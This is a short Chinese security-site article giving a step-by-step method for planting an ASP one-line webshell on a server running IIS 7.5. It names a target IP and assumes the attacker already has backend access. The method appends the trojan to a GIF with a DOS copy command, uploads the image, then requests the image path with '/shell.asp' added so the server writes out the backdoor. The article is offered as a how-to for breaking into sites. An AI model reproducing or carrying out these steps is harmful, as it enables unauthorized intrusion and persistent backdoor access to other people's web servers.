设为首页 - 加入收藏 - 网站地图 SecYe安全 Www.SecYe.Com - 国内网络信息安全IT技术门户网
当前位置:SecYe > 网络安全 > Web安全 > 正文

IIS7.5畸形解析拿shell利用方法

时间:2012-12-08 20:21 来源:未知 作者:www.secye.com 阅读:

目标站:XXXX.com/

目标IP 14.1.20.105

服务器系统Microsoft-IIS/7.5

环境平台ASP.NET

这个站是IIS7.5的 拿站过程就不写了 直接讲进入后台

准备一个txt 写进我们的asp一句话 还有随便的一张图片

然后DOS合并:copy X.gif /b + X.txt/a X.gif

生成X.gif 然后在后台上传合成的图片

得到了XXXX.com/Upload/Uploadfile/images/x.gif是我们图片的地址

然后在地址后面加个shell.asp,

XXXX.com/Upload/Uploadfile/images/x.gif/shell.asp

在浏览器中运行 它会提示错误 然后会在目录下生成

XXXX.com/shell.asp它就是我们的一句话木马地址

BY:半世倾尘

本文来源:SecYe安全网[http://www.secye.com] (责任编辑:SecYe安全)

点击复制链接 与好友分享!

顶一下
(0)
0%
踩一下
(0)
0%